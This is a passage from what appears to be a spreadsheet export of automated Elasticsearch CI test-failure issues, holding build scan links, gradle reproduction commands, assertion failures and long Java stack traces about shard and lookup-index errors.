io.netty.transport@4.1.115.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:444)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)\n\tat io.netty.codec@4.1.115.Final/io.netty.handler.codec.MessageToMessageDecoder.channelRead(MessageToMessageDecoder.java:107)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:444)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1357)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:868)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:166)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:788)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.nio.NioEventLoop.processSelectedKeysPlain(NioEventLoop.java:689)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:652)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:562)\n\tat io.netty.common@4.1.115.Final/io.netty.util.concurrent.SingleThreadEventExecutor$4.run(SingleThreadEventExecutor.java:997)\n\tat io.netty.common@4.1.115.Final/io.netty.util.internal.ThreadExecutorMap$2.run(ThreadExecutorMap.java:74)\n\tat java.base/java.lang.Thread.run(Thread.java:1575)\nCaused by: java.lang.IllegalArgumentException: index with [lookup] mode must have [index.number_of_shards] set to 1 or unset; provided 2\n\tat org.elasticsearch.index.IndexMode$4.validateWithOtherSettings(IndexMode.java:322)\n\tat org.elasticsearch.index.IndexSettings$3.validate(IndexSettings.java:723)\n\tat org.elasticsearch.index.IndexSettings$3.validate(IndexSettings.java:717)\n\tat org.elasticsearch.common.settings.Setting.get(Setting.java:563)\n\tat org.elasticsearch.common.settings.Setting.get(Setting.java:535)\n\tat org.elasticsearch.common.settings.Setting.get(Setting.java:694)\n\tat org.elasticsearch.common.settings.AbstractScopedSettings.get(AbstractScopedSettings.java:747)\n\tat org.elasticsearch.index.IndexSettings.&lt;init&gt;(IndexSettings.java:969)\n\tat org.elasticsearch.indices.IndicesService.createIndexService(IndicesService.java:739)\n\tat org.elasticsearch.indices.IndicesService.withTempIndexService(IndicesService.java:711)\n\tat org.elasticsearch.cluster.metadata.MetadataCreateIndexService.applyCreateIndexWithTemporaryService(MetadataCreateIndexService.java:500)\n\tat org.elasticsearch.cluster.metadata.MetadataCreateIndexService.applyCreateIndexRequestWithV1Templates(MetadataCreateIndexService.java:623)\n\tat org.elasticsearch.cluster.metadata.MetadataCreateIndexService.applyCreateIndexRequest(MetadataCreateIndexService.java:448)\n\tat org.elasticsearch.cluster.metadata.MetadataCreateIndexService$1.execute(MetadataCreateIndexService.java:327)\n\tat org.elasticsearch.cluster.service.MasterService$UnbatchedExecutor.execute(MasterService.java:574)\n\tat org.elasticsearch.cluster.service.MasterService.innerExecuteTasks(MasterService.java:1075)\n\tat org.elasticsearch.cluster.service.MasterService.executeTasks(MasterService.java:1038)\n\tat org.elasticsearch.cluster.service.MasterService.executeAndPublishBatch(MasterService.java:245)\n\tat org.elasticsearch.cluster.service.MasterService$BatchingTaskQueue$Processor.lambda$run$2(MasterService.java:1691)\n\tat org.elasticsearch.action.ActionListener.run(ActionListener.java:452)\n\tat org.elasticsearch.cluster.service.MasterService$BatchingTaskQueue$Processor.run(MasterService.java:1688)\n\tat org.elasticsearch.cluster.service.MasterService$5.lambda$doRun$0(MasterService.java:1283)\n\tat org.elasticsearch.action.ActionListener.run(ActionListener.java:452)\n\tat org.elasticsearch.cluster.service.MasterService$5.doRun(MasterService.java:1262)\n\tat org.elasticsearch.common.util.concurrent.ThreadContext$ContextPreservingAbstractRunnable.doRun(ThreadContext.java:1044)\n\tat org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:27)\n\tat java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)\n\tat java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)\n\tat java.lang.Thread.run(Thread.java:1575)\n"}],"type":"illegal_argument_exception","reason":"index with [lookup] mode must have [index.number_of_shards] set to 1 or unset; provided 2","stack_trace":"java.lang.IllegalArgumentException: index with [lookup] mode must have [index.number_of_shards] set to 1 or unset; provided 2\n\tat org.elasticsearch.index.IndexMode$4.validateWithOtherSettings(IndexMode.java:322)\n\tat org.elasticsearch.index.IndexSettings$3.validate(IndexSettings.java:723)\n\tat org.elasticsearch.index.IndexSettings$3.validate(IndexSettings.java:717)\n\tat org.elasticsearch.common.settings.Setting.get(Setting.java:563)\n\tat org.elasticsearch.common.settings.Setting.get(Setting.java:535)\n\tat org.elasticsearch.common.settings.Setting.get(Setting.java:694)\n\tat org.elasticsearch.common.settings.AbstractScopedSettings.get(AbstractScopedSettings.java:747)\n\tat org.elasticsearch.index.IndexSettings.&lt;init&gt;(IndexSettings.java:969)\n\tat org.elasticsearch.indices.IndicesService.createIndexService(IndicesService.java:739)\n\tat org.elasticsearch.indices.IndicesService.withTempIndexService(IndicesService.java:711)\n\tat org.elasticsearch.cluster.metadata.MetadataCreateIndexService.applyCreateIndexWithTemporaryService(MetadataCreateIndexService.java:500)\n\tat org.elasticsearch.cluster.metadata.MetadataCreateIndexService.applyCreateIndexRequestWithV1Templates(MetadataCreateIndexService.java:623)\n\tat org.elasticsearch.cluster.metadata.MetadataCreateIndexService.applyCreateIndexRequest(MetadataCreateIndexService.java:448)\n\tat org.elasticsearch.cluster.metadata.MetadataCreateIndexService$1.execute(MetadataCreateIndexService.java:327)\n\tat org.elasticsearch.cluster.service.MasterService$UnbatchedExecutor.execute(MasterService.java:574)\n\tat org.elasticsearch.cluster.service.MasterService.innerExecuteTasks(MasterService.java:1075)\n\tat org.elasticsearch.cluster.service.MasterService.executeTasks(MasterService.java:1038)\n\tat org.elasticsearch.cluster.service.MasterService.executeAndPublishBatch(MasterService.java:245)\n\tat org.elasticsearch.cluster.service.MasterService$BatchingTaskQueue$Processor.lambda$run$2(MasterService.java:1691)\n\tat org.elasticsearch.action.ActionListener.run(ActionListener.java:452)\n\tat org.elasticsearch.cluster.service.MasterService$BatchingTaskQueue$Processor.run(MasterService.java:1688)\n\tat org.elasticsearch.cluster.service.MasterService$5.lambda$doRun$0(MasterService.java:1283)\n\tat org.elasticsearch.action.ActionListener.run(ActionListener.java:452)\n\tat org.elasticsearch.cluster.service.MasterService$5.doRun(MasterService.java:1262)\n\tat org.elasticsearch.common.util.concurrent.ThreadContext$ContextPreservingAbstractRunnable.doRun(ThreadContext.java:1044)\n\tat org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:27)\n\tat java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)\n\tat java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)\n\tat java.lang.Thread.run(Thread.java:1575)\n"},"status":400}]  **Issue Reasons:** - [8.x] 2 consecutive failures in test test {p0=esql/190_lookup_join/non-lookup index} - [8.x] 2 failures in test test {p0=esql/190_lookup_join/non-lookup index} (2.4% fail rate in 83 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/119155</t>
  </si>
  <si>
    <t>[CI] DocsClientYamlTestSuiteIT test {yaml=reference/search/search-your-data/retrievers-examples/line_98} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic-platform-support #5448 / ubuntu-2404-aarch64_checkpart1_platform-support-arm](https://gradle-enterprise.elastic.co/s/dudnaecuai7qy) - [elasticsearch-pull-request #47587 / part-1](https://gradle-enterprise.elastic.co/s/vqywvyzimy2b4) - [elasticsearch-pull-request #47578 / part-1](https://gradle-enterprise.elastic.co/s/4kuhmhi7a5muw) - [elasticsearch-pull-request #47426 / part-1](https://gradle-enterprise.elastic.co/s/rzddadclv4uyq) - [elasticsearch-pull-request #47423 / part-1](https://gradle-enterprise.elastic.co/s/bcfcvcc2ss4vu) - [elasticsearch-pull-request #47410 / part-1](https://gradle-enterprise.elastic.co/s/yr6qny765mevm) **Reproduction Line:**  ./gradlew ":docs:yamlRestTest" --tests "org.elasticsearch.smoketest.DocsClientYamlTestSuiteIT.test {yaml=reference/search/search-your-data/retrievers-examples/line_98}" -Dtests.seed=C2C201F68C61D52A -Dtests.locale=en-MP -Dtests.timezone=Asia/Dubai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smoketest.DocsClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Dreference%2Fsearch%2Fsearch-your-data%2Fretrievers-examples%2Fline_98%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [reference/search/search-your-data/retrievers-examples:136]: Expected a map containing _shards: a map containing total: &lt;1&gt; failed: &lt;0&gt; successful: &lt;1&gt; skipped: &lt;0&gt; hits: a map containing hits: a list containing 0: a map containing _index: "retrievers_example" _id: "1" _score: &lt;0.8333334&gt; 1: a map containing _index: "retrievers_example" _id: "2" _score: &lt;0.8333334&gt; 2: a map containing _index: "retrievers_example" _id: expected "3" but was "5" _score: &lt;0.25&gt; total: a map containing value: &lt;3&gt; relation: "eq" max_score: &lt;0.8333334&gt; took: &lt;7&gt; timed_out: &lt;false&gt;  **Issue Reasons:** - [main] 6 failures in test test {yaml=reference/search/search-your-data/retrievers-examples/line_98} (1.3% fail rate in 457 executions) - [main] 5 failures in step part-1 (2.0% fail rate in 250 executions) - [main] 5 failures in pipeline elasticsearch-pull-request (2.0% fail rate in 253 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>? CI-generated</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/119332</t>
  </si>
  <si>
    <t>[CI] XPackRestIT test {p0=ml/data_frame_analytics_cat_apis/Test cat data frame analytics all jobs with header} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic-platform-support #5578 / almalinux-8-aarch64_checkpart3_platform-support-arm](https://gradle-enterprise.elastic.co/s/6hgzz5su6wih6) - [elasticsearch-pull-request #48254 / rest-compatibility](https://gradle-enterprise.elastic.co/s/lif3nmj2i7t6s) - [elasticsearch-pull-request #48056 / rest-compatibility](https://gradle-enterprise.elastic.co/s/bw2qyb7n6wqve) - [elasticsearch-pull-request #48047 / rest-compatibility](https://gradle-enterprise.elastic.co/s/zwqizrlmkfdfq) **Reproduction Line:**  ./gradlew ":x-pack:plugin:yamlRestTest" --tests "org.elasticsearch.xpack.test.rest.XPackRestIT.test {p0=ml/data_frame_analytics_cat_apis/Test cat data frame analytics all jobs with header}" -Dtests.seed=AC5DC1BF94ABF49C -Dtests.locale=khq-Latn-ML -Dtests.timezone=Asia/Aqtobe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xpack.test.rest.XPackRestIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Bp0%3Dml%2Fdata_frame_analytics_cat_apis%2FTest%20cat%20data%20frame%20analytics%20all%20jobs%20with%20header%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [ml/data_frame_analytics_cat_apis:65]: expected [2xx] status code but api [cat.ml_data_frame_analytics] returned [500 Internal Server Error] [{"error":{"root_cause":[{"type":"no_shard_available_action_exception","reason":"[yamlRestTest-0][127.0.0.1:40257][indices:data/read/search[phase/query]]","stack_trace":"org.elasticsearch.action.NoShardAvailableActionException: [yamlRestTest-0][127.0.0.1:40257][indices:data/read/search[phase/query]]\n"}],"type":"exception","reason":"all shards failed","caused_by":{"type":"search_phase_execution_exception","reason":"all shards failed","phase":"query","grouped":true,"failed_shards":[{"shard":0,"index":".ml-stats-000001","node":"dwLlIVxDQ5q53IevMMxPpw","reason":{"type":"no_shard_available_action_exception","reason":"[yamlRestTest-0][127.0.0.1:40257][indices:data/read/search[phase/query]]","stack_trace":"org.elasticsearch.action.NoShardAvailableActionException: [yamlRestTest-0][127.0.0.1:40257][indices:data/read/search[phase/query]]\n"}}],"stack_trace":"Failed to execute phase [query], all shards failed; shardFailures {[dwLlIVxDQ5q53IevMMxPpw][.ml-stats-000001][0]: org.elasticsearch.action.NoShardAvailableActionException: [yamlRestTest-0][127.0.0.1:40257][indices:data/read/search[phase/query]]\n}\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.search.AbstractSearchAsyncAction.onPhaseFailure(AbstractSearchAsyncAction.java:698)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.search.AbstractSearchAsyncAction.executeNextPhase(AbstractSearchAsyncAction.java:364)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.search.AbstractSearchAsyncAction.onPhaseDone(AbstractSearchAsyncAction.java:743)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.search.AbstractSearchAsyncAction.onShardFailure(AbstractSearchAsyncAction.java:458)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.search.AbstractSearchAsyncAction$1.onFailure(AbstractSearchAsyncAction.java:316)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.DelegatingActionListener.onFailure(DelegatingActionListener.java:32)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerResponseHandler.handleException(ActionListenerResponseHandler.java:54)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.search.SearchTransportService$ConnectionCountingHandler.handleException(SearchTransportService.java:593)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.transport.TransportService$UnregisterChildTransportResponseHandler.handleException(TransportService.java:1776)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.transport.TransportService$ContextRestoreResponseHandler.handleException(TransportService.java:1509)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.transport.TransportService$DirectResponseChannel.processException(TransportService.java:1643)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.transport.TransportService$DirectResponseChannel.sendResponse(TransportService.java:1618)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.transport.TaskTransportChannel.sendResponse(TaskTransportChannel.java:44)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.support.ChannelActionListener.onFailure(ChannelActionListener.java:45)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.search.SearchService.lambda$maybeWrapListenerForStackTrace$1(SearchService.java:540)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations$DelegatingResponseActionListener.acceptException(ActionListenerImplementations.java:188)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations$DelegatingResponseActionListener.onFailure(ActionListenerImplementations.java:193)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionRunnable.onFailure(ActionRunnable.java:152)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:29)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.TimedRunnable.doRun(TimedRunnable.java:34)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.ThreadContext$ContextPreservingAbstractRunnable.doRun(ThreadContext.java:1044)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:27)\n\tat java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)\n\tat java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)\n\tat java.base/java.lang.Thread.run(Thread.java:1575)\nCaused by: org.elasticsearch.action.NoShardAvailableActionException: [yamlRestTest-0][127.0.0.1:40257][indices:data/read/search[phase/query]]\n"},"stack_trace":"org.elasticsearch.ElasticsearchException: all shards failed\n\tat org.elasticsearch.xcore@9.0.0-SNAPSHOT/org.elasticsearch.xpack.core.ml.utils.ExceptionsHelper.serverError(ExceptionsHelper.java:69)\n\tat org.elasticsearch.ml@9.0.0-SNAPSHOT/org.elasticsearch.xpack.ml.action.TransportGetDataFrameAnalyticsStatsAction.lambda$searchStats$9(TransportGetDataFrameAnalyticsStatsAction.java:287)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListener$2.onResponse(ActionListener.java:257)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.support.ContextPreservingActionListener.onResponse(ContextPreservingActionListener.java:33)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListener$3.onResponse(ActionListener.java:400)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.tasks.TaskManager$1.onResponse(TaskManager.java:203)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.tasks.TaskManager$1.onResponse(TaskManager.java:197)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations$RunBeforeActionListener.onResponse(ActionListenerImplementations.java:336)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListener$3.onResponse(ActionListener.java:400)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.support.ContextPreservingActionListener.onResponse(ContextPreservingActionListener.java:33)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations$MappedActionListener.onResponse(ActionListenerImplementations.java:97)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListener.respondAndRelease(ActionListener.java:375)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.search.TransportMultiSearchAction$1.finish(TransportMultiSearchAction.java:186)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.search.TransportMultiSearchAction$1.handleResponse(TransportMultiSearchAction.java:181)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.search.TransportMultiSearchAction$1.onFailure(TransportMultiSearchAction.java:174)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.DelegatingActionListener.onFailure(DelegatingActionListener.java:32)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations$RunAfterActionListener.onFailure(ActionListenerImplementations.java:307)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListener$3.onFailure(ActionListener.java:410)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.support.SubscribableListener$FailureResult.complete(SubscribableListener.java:399)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.support.SubscribableListener.tryComplete(SubscribableListener.java:311)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.support.SubscribableListener.setResult(SubscribableListener.java:336)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.support.SubscribableListener.onFailure(SubscribableListener.java:255)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.DelegatingActionListener.onFailure(DelegatingActionListener.java:32)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListener$3.onFailure(ActionListener.java:410)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.tasks.TaskManager$1.onFailure(TaskManager.java:215)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.DelegatingActionListener.onFailure(DelegatingActionListener.java:32)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations$RunBeforeActionListener.onFailure(ActionListenerImplementations.java:346)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListener$3.onFailure(ActionListener.java:410)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.DelegatingActionListener.onFailure(DelegatingActionListener.java:32)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.support.ContextPreservingActionListener.onFailure(ContextPreservingActionListener.java:40)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.DelegatingActionListener.onFailure(DelegatingActionListener.java:32)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.DelegatingActionListener.onFailure(DelegatingActionListener.java:32)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.search.TransportSearchAction$SearchResponseActionListener.onFailure(TransportSearchAction.java:1966)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.DelegatingActionListener.onFailure(DelegatingActionListener.java:32)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations$RunAfterActionListener.onFailure(ActionListenerImplementations.java:307)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListener$3.onFailure(ActionListener.java:410)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.search.AbstractSearchAsyncAction.raisePhaseFailure(AbstractSearchAsyncAction.java:721)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.search.AbstractSearchAsyncAction.onPhaseFailure(AbstractSearchAsyncAction.java:698)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.search.AbstractSearchAsyncAction.executeNextPhase(AbstractSearchAsyncAction.java:364)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.search.AbstractSearchAsyncAction.onPhaseDone(AbstractSearchAsyncAction.java:743)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.search.AbstractSearchAsyncAction.onShardFailure(AbstractSearchAsyncAction.java:458)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.search.AbstractSearchAsyncAction$1.onFailure(AbstractSearchAsyncAction.java:316)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.DelegatingActionListener.onFailure(DelegatingActionListener.java:32)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerResponseHandler.handleException(ActionListenerResponseHandler.java:54)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.search.SearchTransportService$ConnectionCountingHandler.handleException(SearchTransportService.java:593)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.transport.TransportService$UnregisterChildTransportResponseHandler.handleException(TransportService.java:1776)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.transport.TransportService$ContextRestoreResponseHandler.handleException(TransportService.java:1509)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.transport.TransportService$DirectResponseChannel.processException(TransportService.java:1643)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.transport.TransportService$DirectResponseChannel.sendResponse(TransportService.java:1618)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.transport.TaskTransportChannel.sendResponse(TaskTransportChannel.java:44)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.support.ChannelActionListener.onFailure(ChannelActionListener.java:45)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.search.SearchService.lambda$maybeWrapListenerForStackTrace$1(SearchService.java:540)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations$DelegatingResponseActionListener.acceptException(ActionListenerImplementations.java:188)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat 